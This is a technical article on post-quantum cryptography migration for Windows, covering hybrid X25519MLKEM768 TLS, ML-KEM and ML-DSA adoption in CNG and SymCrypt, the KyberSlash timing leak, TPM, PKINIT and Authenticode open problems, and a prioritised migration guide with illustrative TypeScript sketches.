Hybrid TLS X25519MLKEM768. Already in production at internet scale. Cloudflare since October 2022; Apple iMessage PQ3 since February 2024; Signal PQXDH since September 2023 [@signal-pqxdh]; OpenSSH since version 9.0 (April 2022) via sntrup761x25519-sha512 (Streamlined NTRU Prime + X25519) [@openssh-9-0], with the ML-KEM-768-based group mlkem768x25519-sha256 added in OpenSSH 9.9 (September 2024) [@openssh-9-9]; Google Chrome; Microsoft Edge. Schannel preview on 24H2 and Server 2025 in early 2026 [@cloudflare-pq-for-all, @cloudflare-pq-2024, @apple-imessage-pq3].

Apple's framing of PQ3 as "Level 3" is the policy-marketing achievement of the post-quantum era. Level 1 is no post-quantum; Level 2 is post-quantum key establishment for the initial handshake; Level 3 is post-quantum key establishment for both the initial handshake and ongoing message-key ratcheting. iMessage PQ3 reached Level 3 in February 2024 -- six months before ML-KEM was even FIPS-finalised. The companion symbolic-analysis PDF Apple commissioned confirms the parameter split: ML-KEM-1024 for the initial key exchange, Kyber-768 for the ongoing ratchet [@apple-imessage-pq3].

Hybrid key exchange: A key-exchange construction that combines a classical key-agreement algorithm (X25519, ECDH-P256, RSA) with a post-quantum KEM (ML-KEM-768) in such a way that the final shared secret depends on both components. An adversary who breaks either component but not both learns nothing. The most common combiner is HKDF-Extract over the concatenation of the two shared secrets, per `draft-ietf-tls-hybrid-design-16` [@draft-tls-hybrid]. Hybrid is the migration choice during the period when neither classical nor post-quantum primitives can be trusted standalone -- classical because of harvest-now-decrypt-later, post-quantum because of the narrower cryptanalytic margin (see Section 8).

Compact portfolio comparison for the KEM side (HQC sizes are current Round-4 parameters from the HQC project specification [@hqc-project]):

Algorithm	Public key	Ciphertext	Hardness	NIST status	Microsoft adoption
ML-KEM-768	1184 B	1088 B	Module-LWE	FIPS 203	SymCrypt 103.5.0; CNG; Schannel hybrid
HQC-1	2241 B (cat 1)	4433 B (cat 1)	Quasi-cyclic codes	Round-4 selected (March 2025)	Not yet in SymCrypt
Classic McEliece	~261 KB to ~1 MB	~128 B to ~240 B	Goppa codes	Round-4 niche	Not in SymCrypt
Hybrid X25519+MLKEM768	1216 B	1120 B	X25519 OR Module-LWE	TLS 1.3 IETF draft	Schannel preview, default-on roadmap

Signature side:

Algorithm	Public key	Signature	Hardness	NIST status	Microsoft adoption
ML-DSA-65	1952 B	3309 B	Module-LWE / Module-SIS	FIPS 204	SymCrypt 103.7.0; CNG
Falcon-512	897 B	666 B [@falcon-spec]	NTRU lattices	FIPS 206 draft	Not in SymCrypt
SLH-DSA-SHA2-128f	32 B	17088 B	SHA-2 collision resistance	FIPS 205	Planned `BCRYPT_SLHDSA_ALGORITHM`
LMS / HSS	60 B	4-50 KB	Hash preimage	NIST SP 800-208	SymCrypt 103.6.0
Composite ML-DSA-65 + ECDSA-P256	~2 KB	~3.4 KB	ML-DSA AND ECDSA	LAMPS draft-19	AD CS pilot path

The portfolio works as long as one of its families holds. But what if it doesn't? What does cryptography not tell us about the future, and what are the structural limits of even the strongest post-quantum primitive?

8. Theoretical Limits -- What PQC Does and Does Not Solve

Post-quantum cryptography is not magic. It closes one specific channel of one specific threat model, and engineers who treat it as "now we're quantum-safe" miss the four limits the cryptographers themselves keep flagging.

1. The cryptanalysis margin is narrower than for RSA or ECDH. The best classical algorithm for solving Module-LWE at NIST parameter sizes (BKZ with sieving) runs in roughly $2^{0.292 n}$ operations, where $n$ is the BKZ block size (the dimension of the sublattice handed to the sieve) rather than the full lattice dimension; the best quantum variant runs in roughly $2^{0.257 n}$. That is a 12% exponent reduction -- not a Shor-style polynomial-time collapse. NIST parameter sizes carry a small but measurable margin to absorb future BKZ-with-sieving improvements. The hardness conjecture is stronger than RSA's (worst-case-to-average-case reduction), but the cryptanalytic frontier is thinner. Lattice cryptanalysis has improved continuously since Ajtai 1996; whether the asymptotic exponent further drops in the next decade is an open problem [@regev-2005, @langlois-stehle-modulelwe].

2. The side-channel surface is larger. ML-DSA's rejection-sampling loop is secret-correlated; Falcon's Gaussian sampler requires floating-point arithmetic; ML-KEM's polynomial operations can leak through cache-timing channels. The most visceral example is KyberSlash (eprint 2024/1049, advisory GHSA-x5j2-g63m-f8g4), in which Bernstein and collaborators demonstrated that the official Kyber reference implementation contained a secret-dependent division-timing leak that survived multiple rounds of NIST review and recovered secret keys in minutes on a Raspberry Pi 2 [@kyberslash-2024].

KyberSlash is the most important data point in PQC implementation security. The leak was a single `/` operator that compiled to a variable-time integer division on ARM and on older x86-64. The vulnerability survived years of formal NIST review, multiple academic implementations, and several vendor ports. Constant-time discipline is more fragile in PQ primitives than in classical primitives -- both because the algorithms are newer and because the ring arithmetic offers many more variable-time corners than the simpler scalar arithmetic of ECDH or RSA. The KyberSlash site, authored by Bernstein, documents specific implementations affected [@kyberslash-2024].

3. The signed-binary harvest is not closed by PQ. This is the article's third aha moment, and the one most readers miss. A 2026 Authenticode signature on a 2026 Windows driver uses RSA-2048 + SHA-256. In 2035, the verifier may no longer trust RSA-2048 -- but the binary has already been loaded by every machine that downloaded it. Authenticode is not a transport channel. There is no migration-window analogue of harvest-now-decrypt-later because the signature was already validated at load time. The threat model is "an adversary in 2035 forges a new signature on a new binary," not "an adversary in 2035 decrypts a 2026 conversation." The two threat models call for different migration disciplines.

Key idea: Post-quantum cryptography closes the harvest-now-decrypt-later channel for transport-protected traffic (TLS, IPsec, SSH, iMessage). It does not close the signed-binary persistence channel; a 2035 quantum-forged signature on a 2035 driver is a new attack, not a retroactive decryption of a 2026 signature. It does not close the algorithm-agility gap; CNG ships per-algorithm identifiers, not per-algorithm-class. Plan migration accordingly. Hybrid TLS first; composite X.509 chain second; firmware signing pilot third. Authenticode and PKINIT can wait for Microsoft's published specifications -- and premature migration in those surfaces is worse than no migration.

4. The algorithm-agility problem persists. Microsoft has shipped CNG identifiers per algorithm (BCRYPT_MLKEM_ALGORITHM, BCRYPT_MLDSA_ALGORITHM) rather than per algorithm-class (a hypothetical BCRYPT_PQ_KEM_ALGORITHM that selected the underlying primitive at runtime). The IETF treats algorithm agility as a load-bearing concern in draft-ietf-pquip-pqc-engineers-14 (26 August 2025), the IETF informational document on engineering PQC into existing protocol surfaces [@draft-pquip-engineers]. CNG does not yet treat it as load-bearing; the engineering consequences for the next migration are discussed in Section 9.4.
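Limit 2 above traces KyberSlash to one division operator. The sketch below shows the general repair pattern under stated assumptions: a division-based 1-bit compression of a coefficient modulo q = 3329 next to a multiply-and-shift variant that avoids the division. The function names are hypothetical, the constants 1665 and 80635 (approximately 2^28 / 3329) are recalled from the patched reference code and should be checked against the upstream source, and TypeScript itself offers no constant-time guarantee, so this illustrates the arithmetic only.

```typescript
const Q = 3329; // ML-KEM modulus

// Division-based compression of one coefficient (0 <= x < Q) to a message bit.
// On some targets the integer division runs in input-dependent time.
function compressBitWithDivision(x: number): number {
  return Math.floor(((x << 1) + Math.floor(Q / 2)) / Q) & 1;
}

// Division-free variant: multiply by a precomputed reciprocal, then shift.
// The largest intermediate value is 8321 * 80635, which fits in 31 bits.
function compressBitDivisionFree(x: number): number {
  let t = x << 1;
  t += 1665;
  t = Math.imul(t, 80635);
  t >>>= 28;
  return t & 1;
}

// Exhaustively compare both variants over every valid coefficient.
function variantsAgree(): boolean {
  for (let x = 0; x < Q; x++) {
    if (compressBitWithDivision(x) !== compressBitDivisionFree(x)) {
      return false;
    }
  }
  return true;
}
```

Because the input range is only 3329 values, an exhaustive comparison such as `variantsAgree()` is cheap, which is one reason this class of fix is straightforward to validate once the leak is known.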

Algorithm agility: The property of a cryptographic protocol or library that lets the underlying algorithm change without changing the protocol or API surface. A protocol that names "AES-256-GCM" instead of "an AEAD with at least 128-bit security" has poor algorithm agility; replacing AES-256-GCM with ChaCha20-Poly1305 requires the entire protocol to be re-negotiated. CNG's `BCRYPT_MLKEM_ALGORITHM` is per-algorithm rather than per-algorithm-class; a future Round-5 KEM will require new CNG plumbing rather than a parameter change. The IETF `pqc-engineers` document treats algorithm agility as the load-bearing engineering concern for the post-2030 migration window [@draft-pquip-engineers].

A common confusion is the simultaneous truth that lattice cryptography has a *stronger* hardness argument than RSA (the worst-case-to-average-case reduction) and a *narrower* cryptanalytic margin (the 12% exponent gap). Both are true. The strength claim is structural: every average-case Module-LWE instance is hard if any worst-case lattice instance is hard. The narrowness claim is empirical: the best known algorithm is closer to a feasibility threshold than the best known algorithm for factoring or for elliptic-curve discrete log. The conservative McEliece line trades the strength claim (no analogous reduction) for an even wider empirical margin (no progress on Goppa-code decoding in 48 years). Engineers who treat "stronger hardness" and "wider margin" as synonyms get the post-quantum picture backwards. The honest framing: lattice is the deployable post-quantum, McEliece is the conservative fallback, and the portfolio exists because no one assumption carries everything.
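The 12% exponent gap quoted in this section is plain arithmetic on the two sieving exponents. A minimal sketch, assuming the 0.292 and 0.257 constants given above; the dimension used in the usage note is a hypothetical illustration, not an ML-KEM parameter.

```typescript
// Sieving cost exponents as quoted in the text: cost is roughly 2^(c * n).
const CLASSICAL_EXPONENT = 0.292;
const QUANTUM_EXPONENT = 0.257;

// Relative reduction in the exponent when moving from classical to quantum sieving.
function relativeExponentReduction(): number {
  return (CLASSICAL_EXPONENT - QUANTUM_EXPONENT) / CLASSICAL_EXPONENT;
}

// Estimated attack cost in bits (log2 of operations) for a lattice dimension n.
function costBits(n: number): { classical: number; quantum: number } {
  return {
    classical: CLASSICAL_EXPONENT * n,
    quantum: QUANTUM_EXPONENT * n,
  };
}
```

For a hypothetical dimension of 400, `costBits(400)` gives roughly 116.8 classical bits against 102.8 quantum bits: the quantum attacker gains about 14 bits, whereas Shor's algorithm against RSA removes the exponential cost entirely.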

These four limits are not bugs; they are structural. But they are not the only open problems. What is the cryptographer's current research frontier, and where will the next migration begin?

9. Open Problems -- Where the Active Research Is

What do Microsoft, NIST, and the IETF still not know? Five open problems whose resolution will define the next decade of Windows cryptography.

9.1 TPM 2.0 and Pluton blob-size constraints

Default MAX_COMMAND_SIZE and MAX_RESPONSE_SIZE on TPM 2.0 are 4096 bytes. ML-DSA-87 signatures (4627 bytes) overflow the response buffer; ML-DSA-65 (3309 bytes) fits. NV memory budgets on commodity TPMs are tightly constrained, which means storing a single ML-DSA-87 keypair (2592-byte public key plus a multi-kilobyte private state) consumes a meaningful fraction of the available NV slot space [@wolfssl-wolftpm-v185, @fips-204-pdf]. The TCG TPM 2.0 Library Specification v1.85 (March 2026) introduces the streaming command family that resolves the buffer overflow; the cited wolfSSL secondary source enumerates the new commands verbatim as TPM2_SignSequenceStart / TPM2_VerifySequenceStart, TPM2_SignSequenceComplete / TPM2_VerifySequenceComplete, and TPM2_SignDigest / TPM2_VerifyDigestSignature for digest-mode operations, plus TPM2_Encapsulate and TPM2_Decapsulate for ML-KEM, with the new structures TPM2B_KEM_CIPHERTEXT, TPM2B_SHARED_SECRET, and TPM_ST_MESSAGE_VERIFIED (the matching *SequenceUpdate opcode is implied by analogy with the existing TPM 2.0 hash-sequence command family but is not enumerated in the available secondary source pending TCG primary access) [@wolfssl-wolftpm-v185]. Commodity v1.85-capable chips are entering early sampling in 2026; Pluton's Rust firmware can move faster but is locked to specific SoC generations.

Pluton's SoC-generation locking is the structural cost of its update-channel advantage. The Microsoft Learn Pluton page enumerates the currently supported families (AMD Ryzen 6000, 7000, 8000, 9000, and Ryzen AI Series; Intel Core Ultra 200V Series, Ultra Series 3, and (non-Ultra) Series 3 processors; Qualcomm Snapdragon 8cx Gen 3 and Snapdragon X Series) [@pluton-microsoft-learn]; OEMs without those silicon options cannot ship Pluton-backed PQC even when the firmware-update mechanism is ready. The Pluton sibling article spells out the silicon-side mechanics.
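The buffer constraint reduces to a size comparison. The sketch below is a hedged illustration, not a TPM API: it uses the ML-DSA signature sizes listed in FIPS 204 (2420, 3309, and 4627 bytes) and the 4096-byte default named above, and the `overheadBytes` parameter is a hypothetical placeholder for response framing that a real stack would have to measure.

```typescript
type MlDsaParameterSet = "ML-DSA-44" | "ML-DSA-65" | "ML-DSA-87";

// Signature sizes in bytes, per FIPS 204.
const ML_DSA_SIGNATURE_BYTES: Record<MlDsaParameterSet, number> = {
  "ML-DSA-44": 2420,
  "ML-DSA-65": 3309,
  "ML-DSA-87": 4627,
};

// Default TPM 2.0 response buffer size quoted in the text.
const TPM_DEFAULT_MAX_RESPONSE_SIZE = 4096;

// True when a signature plus framing overhead fits in one response buffer.
// overheadBytes is an assumption; it is not taken from the TPM specification.
function fitsInSingleResponse(
  signatureBytes: number,
  overheadBytes: number = 0,
  maxResponseSize: number = TPM_DEFAULT_MAX_RESPONSE_SIZE,
): boolean {
  return signatureBytes + overheadBytes <= maxResponseSize;
}

// List the parameter sets that would need a streaming (sequence) command.
function parameterSetsNeedingStreaming(): MlDsaParameterSet[] {
  const all: MlDsaParameterSet[] = ["ML-DSA-44", "ML-DSA-65", "ML-DSA-87"];
  return all.filter((p) => !fitsInSingleResponse(ML_DSA_SIGNATURE_BYTES[p]));
}
```

With zero overhead, only ML-DSA-87 lands in the streaming list, which matches the overflow described above.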

9.2 Kerberos PKINIT

RFC 4556's certificate-of-the-KDC bootstrap currently uses RSA-OAEP or pre-shared-secret-via-ECDH for AS-REP key establishment. The KDC certificate could be composite-ML-DSA-signed, but the AS-REP encryption key derivation has no IETF post-quantum migration draft as of May 2026. Every Windows domain join, every smart-card logon, every Kerberos-authenticated SMB or RDP or IIS session depends on PKINIT -- and PKINIT has no PQ path. The NTLM-to-PKINIT migration (the subject of a sibling article on NTLM deprecation) was hard enough; the PKINIT-to-PQ-PKINIT migration has not started.

9.3 Authenticode and the EFI signature database

A Windows machine that boots in 2035 must verify boot loaders signed between 2010 and 2035. The EFI signature-database revocation list (dbx) is roughly 32 KB on commodity platforms [@uefi-dbx]. Replacing each entry's RSA-2048 signature (256 bytes) with ML-DSA-65 (3309 bytes) multiplies the per-entry signature size by ~13×; with SLH-DSA-SHA2-128f (17088 bytes), by ~67×. No public Microsoft Secure Boot post-quantum roadmap exists as of May 2026. LMS is the obvious candidate -- CNSA 2.0 mandates LMS or XMSS for firmware signing -- but the dbx-size question remains open. See the Secure Boot sibling article in this series.

9.4 Algorithm agility as a separately engineered property

Section 8 limit-4 introduced algorithm agility as a structural property the IETF treats as load-bearing [@draft-pquip-engineers]. The open engineering problem is the CNG provider-interface design. Today every consumer -- Schannel, AD CS, IKEv2, SMB, RDP, Authenticode -- is wired to a specific algorithm identifier (BCRYPT_MLKEM_ALGORITHM, BCRYPT_MLDSA_ALGORITHM). A future migration to a NIST Round-5 KEM has to re-do every one of those wiring points, the same shape of problem CNG had with the RSA-to-ECDSA transition. Solving algorithm agility means redesigning the CNG provider interface around algorithm families rather than algorithm names -- a multi-year engineering programme that nobody has publicly committed to, and that the post-2030 migration window depends on.
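To make the family-versus-name distinction concrete, here is a minimal sketch of a consumer that asks for an algorithm family rather than a named algorithm. Everything in it is hypothetical: `KemFamilyRegistry`, the `"pq-kem"` family label, and `describeKeyExchange` are illustrative names and do not correspond to any CNG interface.

```typescript
interface KemDescriptor {
  name: string;
  encapsulationKeyBytes: number;
  ciphertextBytes: number;
}

// Hypothetical registry mapping an algorithm family to its current binding.
class KemFamilyRegistry {
  private readonly byFamily = new Map<string, KemDescriptor>();

  bind(family: string, kem: KemDescriptor): void {
    this.byFamily.set(family, kem);
  }

  resolve(family: string): KemDescriptor {
    const kem = this.byFamily.get(family);
    if (kem === undefined) {
      throw new Error(`no KEM bound to family ${family}`);
    }
    return kem;
  }
}

// A consumer wired to the family: it never names the concrete algorithm.
function describeKeyExchange(registry: KemFamilyRegistry): string {
  const kem = registry.resolve("pq-kem");
  return `${kem.name}: ${kem.encapsulationKeyBytes} B key, ${kem.ciphertextBytes} B ciphertext`;
}
```

Rebinding `"pq-kem"` from ML-KEM-768 to another KEM changes what `describeKeyExchange` reports without touching the consumer. That is the property a per-algorithm identifier cannot provide, since every consumer would have to be rewired by hand.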

9.5 The PKI rebuild before 2035

Every TLS server certificate, every code-signing certificate, every smart-card user certificate has to be re-issued in a post-quantum algorithm before the legacy algorithm is disallowed. The throughput of the global public-CA system is the limiting factor. Commercial CAs are pilot-issuing composite-signed roots in 2026; volume issuance lags by years. NIST IR 8547 (12 November 2024) proposes deprecating quantum-vulnerable algorithms in NIST standards by 2035 [@nist-ir-8547].

NIST IR 8547 proposes the timeline; CNSA 2.0 imposes it on U.S. National Security Systems; CA/Browser Forum will eventually impose it on public web PKI. The unfunded part is the operational work. Every organisation operating an internal Windows AD CS hierarchy has to re-issue its root, its issuing CAs, and every end-entity certificate. The Microsoft tooling for this rebuild is the AD CS composite-signature support and the CertEnroll ML-DSA template path. The CA throughput question is real -- a typical commercial CA issues at peak in the low hundreds of thousands of certificates per day, and the global web PKI runs at orders of magnitude more -- which is why composite signatures are the deployment story for 2026-2030 and pure-PQ X.509 is the post-2030 story [@nist-ir-8547, @draft-lamps-composite].

flowchart TD
  OP1["TPM / Pluton blob-size limits (v1.85)"]
  OP2["Kerberos PKINIT bootstrap"]
  OP3["Authenticode and EFI dbx"]
  OP4["CNG algorithm agility"]
  OP5["Global PKI rebuild by 2035"]
  OP1 --> S1["Hello attestation"]
  OP1 --> S2["BitLocker network unlock"]
  OP1 --> S3["Trustlet attestation"]
  OP2 --> S4["Domain join"]
  OP2 --> S5["Smart-card logon"]
  OP2 --> S6["Kerberos-mediated SMB / RDP / IIS"]
  OP3 --> S7["Driver loading"]
  OP3 --> S8["Secure Boot revocation"]
  OP4 --> S9["Schannel / AD CS / IKEv2 / SMB / RDP"]
  OP5 --> S10["Every X.509 certificate in the estate"]

Note: ML-DSA-87 keys cannot live on a TPM 2.0 chip whose firmware predates Library Specification v1.85. Three Windows surfaces are stuck on RSA-2048 / ECDSA-P256 until v1.85-capable chips reach retail volume: Windows Hello attestation (TPM-bound), BitLocker network unlock (depends on TPM key sealing), and Trustlet attestation (LSAISO / Credential Guard). Pluton can move faster than discrete TPMs because its firmware ships through Windows Update; the cross-reference to the Pluton sibling article explains the firmware-update agility mechanism [@wolfssl-wolftpm-v185, @ms-quantum-safe-blog].

Five open problems, five decade-scale research programmes, five places where a Windows engineer's procurement decision in 2026 will be visible in 2035. So what does that engineer do on Monday morning?

10. Practical Guide -- What an Engineer Does Monday Morning

Six actions, in priority order. Each is doable in May 2026. Each closes a real gap. The first three require no procurement cycle; procurement decisions start at Action 4.

Note: Run a CNG inventory against HKLM\SYSTEM\CurrentControlSet\Control\Cryptography and the registered providers. Catalogue certificate templates with certutil -template. Enumerate Schannel cipher suites with Get-TlsCipherSuite on every Schannel-using service. Identify every place RSA-2048, ECDSA-P256, ECDH/X25519, RSA-PSS, and DSA appear in your estate. Output is a CSV. The CSV is the input to every subsequent action. Without inventory, the migration is a guessing game [@cng-algorithm-ids].

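```typescript
// Pseudo-code for a Schannel cipher-suite inventory.
// In real PowerShell: Get-TlsCipherSuite | Select-Object Name, Hash, Cipher, Exchange
// This logic flags quantum-vulnerable Exchange groups (RSA, ECDH-*-without-PQ-companion).
type CipherSuite = {
  name: string;
  exchange: string; // "ECDHE", "DHE", "RSA", "X25519MLKEM768", ...
  cipher: string;   // "AES-256-GCM", "ChaCha20-Poly1305", ...
  hash: string;     // "SHA-384", "SHA-256", ...
};

const QUANTUM_VULNERABLE_EXCHANGE = new Set([
  "RSA", "DHE", "ECDHE", "ECDH",      // classical key agreement
  "X25519", "SecP256r1", "SecP384r1", // unwrapped classical EC groups
]);

const QUANTUM_SAFE_EXCHANGE = new Set([
  "X25519MLKEM768", "SecP256r1MLKEM768", "SecP384r1MLKEM1024",
  "MLKEM768", "MLKEM1024",
]);

// Minimal classification step (a sketch): exchanges in neither set are
// reported as "unknown" for manual review rather than guessed.
type Verdict = "quantum-vulnerable" | "quantum-safe" | "unknown";

function classifyExchange(suite: CipherSuite): Verdict {
  if (QUANTUM_SAFE_EXCHANGE.has(suite.exchange)) return "quantum-safe";
  if (QUANTUM_VULNERABLE_EXCHANGE.has(suite.exchange)) return "quantum-vulnerable";
  return "unknown";
}

// Return the suites that belong in the migration CSV.
function flagQuantumVulnerable(suites: CipherSuite[]): CipherSuite[] {
  return suites.filter((s) => classifyExchange(s) !== "quantum-safe");
}
```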

Note: Cloudflare-fronted endpoints already negotiate X25519MLKEM768 by default [@cloudflare-pq-for-all, @cloudflare-pq-2024]. For Windows servers using OpenSSL 3.5+, enable hybrid. For Schannel-only servers, monitor the Group Policy toggle on 24H2 and the documented Schannel curve preference order. Hybrid is the immediate harvest-now-decrypt-later defence -- the one place where a single configuration change measurably reduces today's exposure to a future quantum break.

Note: Issue one composite root, one composite issuing CA, one composite end-entity certificate in a non-production lab. Validate consumption by an updated Schannel client and Microsoft Edge. The point is to surface the operational rough edges -- template definition, key-archival behaviour with PQ keys, certificate-validation timing on uplevel and downlevel clients -- before they hit production. This is the load-bearing 2026-2030 PKI migration on-ramp; the composite OID is downlevel-compatible, so the failure mode of an uplevel client validating an unaltered classical chain is the baseline, not a regression [@draft-lamps-composite].

Note: Current TPM 2.0 v1.84 chips on most Windows 11 endpoints will not accept ML-DSA-87 keys without a firmware update. Use Get-Tpm and the TBS API to enumerate supported algorithms; if BCryptOpenAlgorithmProvider for ML-DSA returns NTE_NOT_SUPPORTED against the platform crypto provider, the underlying TPM does not yet expose the PQ surface. If your hardware lifetime extends past 2030, wait for v1.85-capable chips (early sampling 2026) or Pluton (already shipping with on-die firmware updates). Inventory your fleet's TPM firmware versions today; the migration plan needs to know the floor [@wolfssl-wolftpm-v185].

Note: UEFI capsule signing, OEM driver signing, and secure-boot dbx revocation entries are all candidates for LMS or XMSS [@cnsa20-csa]. The stateful-counter requirement is acceptable because build pipelines already track build numbers monotonically. The CNG identifier BCRYPT_LMS_ALGORITHM is prerelease; SymCrypt v103.6.0 ships LMS [@symcrypt-changelog]. Start the pilot in a non-production signing service that has secure HSM custody of the counter state. The firmware-signing migration is the only place where CNSA 2.0 explicitly prefers stateful hash-based signatures over ML-DSA, because firmware signing is the use case where state discipline is realistic.
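The state discipline that LMS and XMSS demand can be sketched as a counter that is persisted before an index is ever handed to the signer. This is a minimal illustration under stated assumptions: `CounterStore`, `InMemoryCounterStore`, and `LeafIndexAllocator` are hypothetical names, and a production signing service would keep this state inside the HSM rather than in process memory.

```typescript
// Hypothetical persistence interface; a real deployment would back this with HSM state.
interface CounterStore {
  load(): number;
  save(next: number): void;
}

class InMemoryCounterStore implements CounterStore {
  private value = 0;
  load(): number {
    return this.value;
  }
  save(next: number): void {
    this.value = next;
  }
}

class LeafIndexAllocator {
  private readonly store: CounterStore;
  private readonly maxLeaves: number;

  constructor(store: CounterStore, maxLeaves: number) {
    this.store = store;
    this.maxLeaves = maxLeaves;
  }

  // Reserve the next one-time leaf index. The incremented counter is saved
  // BEFORE the index is returned, so a crash can waste an index but never reuse one.
  reserve(): number {
    const index = this.store.load();
    if (index >= this.maxLeaves) {
      throw new Error("one-time keys exhausted; rotate the signing key");
    }
    this.store.save(index + 1);
    return index;
  }
}
```

The design choice worth noting is the ordering inside `reserve()`: saving first trades a possibly wasted leaf for the guarantee that no leaf signs twice, which is the failure a stateful hash-based scheme cannot tolerate.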

Note: Post-quantum Authenticode is not specified by Microsoft as of May 2026. Premature migration breaks downlevel verification. The discipline is: hybrid TLS first, composite X.509 chain second, AD CS pilot third, firmware-signing pilot fourth, and leave Authenticode alone until Microsoft publishes the post-quantum Authenticode specification. Authenticode signatures are validated at binary load time; harvest-now-decrypt-later does not apply, and there is no urgency that justifies risking downlevel-verifier breakage. This is the action that takes restraint rather than effort.

The priority ordering follows the threat model. Hybrid TLS is first because it closes harvest-now-decrypt-later on transport traffic with no compatibility cost (the classical share remains in the handshake; an uplevel server falls back to classical-only cleanly when the client does not offer the hybrid group). Composite X.509 is second because it lets you build a post-quantum-ready PKI hierarchy now and surfaces operational rough edges before pure-PQ deployments. Firmware signing is third because the stateful-counter discipline requires HSM-mediated key custody and a long lead time for the signing pipeline. Authenticode is last because there is no specification and no urgency.

One quarter to inventory, two quarters to pilot, two years to volume. Now for the questions every engineer asks after reading.

11. Frequently Asked Questions and Closing

Yes, when the server supports `X25519MLKEM768` and your Edge build negotiates it. Check via the Edge devtools' Security panel, or test against a Cloudflare-fronted endpoint with the Edge URL bar's connection information popup. Cloudflare reported nearly two percent of all TLS 1.3 connections to its edge were post-quantum-protected in March 2024, with a forecast of double-digit adoption by year-end [@cloudflare-pq-2024]. Endpoints that have not enabled hybrid TLS still negotiate X25519 alone, which leaves you exposed to harvest-now-decrypt-later.

Not as of May 2026. Schannel's hybrid TLS 1.3 preview is gated behind Group Policy on 24H2 and Server 2025. Microsoft's Quantum-Safe Security blog frames May 2026 to November 2026 as the milestone window for default-on negotiation [@ms-quantum-safe-blog]. Until then, the Schannel side has to be explicitly opted in via the cipher-preference order and the Group Policy toggle.

No, not on the public record. Post-quantum Authenticode is not yet specified. The CNG `BCRYPT_MLDSA_ALGORITHM` exists, and SymCrypt 103.7.0 implements ML-DSA, but the Authenticode signature format and the verifier policy have not been updated to accept post-quantum algorithms. Premature migration breaks downlevel verification on every Windows machine that has not received the PQ Authenticode update -- which today is *every* Windows machine. Do not migrate Authenticode prematurely.

Only against harvest-now-decrypt-later. Today's TLS is not under quantum attack -- quantum computers capable of breaking RSA-2048 or ECDH-X25519 do not exist in 2026. But today's TLS *traffic can be recorded* today, and if a sufficient quantum computer exists in 2040 the recorded traffic can be decrypted then. Enabling hybrid TLS now closes that window; enabling it in 2035 does not retroactively protect the traffic recorded in 2026 [@mosca-2015].

Nobody knows. CNSA 2.0 picks 2035 as the policy deadline, not a technical forecast [@cnsa20-csa]. Mosca's 2015 estimate, widely reproduced in PQC literature, was a 1/2 chance of breaking RSA-2048 by 2031. Quantum-engineering progress between 2015 and 2026 has been substantial on the qubit-count axis and modest on the error-correction axis; the underlying question -- when a thousand-logical-qubit fault-tolerant device becomes available -- has no consensus answer in 2026. CNSA 2.0's job is to make the answer not matter.

Hybrid `X25519MLKEM768` protects you against a break of either component. The HKDF combiner in `draft-ietf-tls-hybrid-design-16` requires both component shared secrets to be uniform-looking from the adversary's perspective; an attacker who breaks only ML-KEM still cannot recover the session key without also breaking X25519 [@draft-tls-hybrid]. Pure ML-KEM (no hybrid) does not have this property. The central design choice of the IETF hybrid construction is that it pays the byte cost (~1.2 KB extra per handshake) to buy the safety margin.

The kilobyte scale is structural to lattice mathematics; it is not a parameter-tuning issue. The minimum key size for a Module-LWE-based KEM at NIST category 3 is set by the dimension required for security under the best known lattice-sieving attacks. ML-KEM-768 at 1184 bytes is already aggressively tuned [@wp-kyber]. The alternatives that offer smaller keys (Falcon at 897 bytes, SIKE-when-it-was-alive at ~330 bytes) buy that size with either constant-time difficulty (Falcon's Gaussian sampler) or fragility (SIKE collapsed in July 2022). Classical comparisons: X25519's 32-byte public value is the floor; Classic McEliece's ~1 MB is the ceiling.

Only if your procurement timeline extends past 2030. As of May 2026, TPM 2.0 v1.85-PQ-spec-compliant chips are in announcement and early-sampling stages, not in retail volume [@wolfssl-wolftpm-v185]. Pluton is shipping, but is locked to specific SoC generations (current Intel Core Ultra series, AMD Ryzen 8000-series, Qualcomm Snapdragon X) [@pluton-microsoft-learn]. If you replace endpoints every three years, your 2026 procurement decision will be visible in 2029, before any post-quantum TPM mandate bites. If your refresh cycle is five-to-seven years, the calculus changes -- but the answer is still "wait for v1.85 silicon to ship at volume" unless you can write a specific business case for the early-adopter risk.
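The byte cost that the hybrid answers above refer to can be reproduced from the component sizes quoted elsewhere in this article (32-byte X25519 share, 1184-byte ML-KEM-768 encapsulation key, 1088-byte ciphertext). The sketch below is arithmetic only; the function name is hypothetical, and reading the "~1.2 KB extra" figure as the ML-KEM-768 encapsulation key added to the ClientHello is an interpretation, not something the source states.

```typescript
const X25519_SHARE_BYTES = 32;
const MLKEM768_ENCAPSULATION_KEY_BYTES = 1184;
const MLKEM768_CIPHERTEXT_BYTES = 1088;

interface HybridKeyShareSizes {
  clientHelloShare: number;      // X25519 share + ML-KEM-768 encapsulation key
  serverHelloShare: number;      // X25519 share + ML-KEM-768 ciphertext
  clientExtraOverX25519: number; // bytes added to the ClientHello versus X25519 alone
  serverExtraOverX25519: number; // bytes added to the ServerHello versus X25519 alone
}

// Compute key_share sizes for the X25519MLKEM768 hybrid group.
function hybridKeyShareSizes(): HybridKeyShareSizes {
  const clientHelloShare = X25519_SHARE_BYTES + MLKEM768_ENCAPSULATION_KEY_BYTES;
  const serverHelloShare = X25519_SHARE_BYTES + MLKEM768_CIPHERTEXT_BYTES;
  return {
    clientHelloShare,
    serverHelloShare,
    clientExtraOverX25519: clientHelloShare - X25519_SHARE_BYTES,
    serverExtraOverX25519: serverHelloShare - X25519_SHARE_BYTES,
  };
}
```

The result is 1216 bytes in the ClientHello and 1120 bytes in the ServerHello, so each direction grows by a little over one kilobyte compared with X25519 alone.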

Closing

A Windows endpoint opens a connection to cloudflare.com. The 1184-byte field on the wire is no longer a curiosity. It is a thirty-year migration in a single TLS extension. The bytes have a history: Diffie and Hellman in 1976; Shor in 1994; McEliece's megabyte keys; HFE and its descendants broken by Beullens; NTRU patented for two decades; Regev's quantum-reduction LWE in 2005; the Ring-LWE compression of 2010; the Module-LWE knob of 2012; BCNS 2014 from Microsoft Research Redmond; Cloudflare-by-default on October 3, 2022; the Castryck-Decru break twenty-five days after NIST's July 2022 selection; SymCrypt 103.5.0; the FIPS publications of August 13, 2024; the CNG BCRYPT_MLKEM_ALG_HANDLE exposed in Insider Canary in May 2025; Schannel preview behind Group Policy in early 2026.

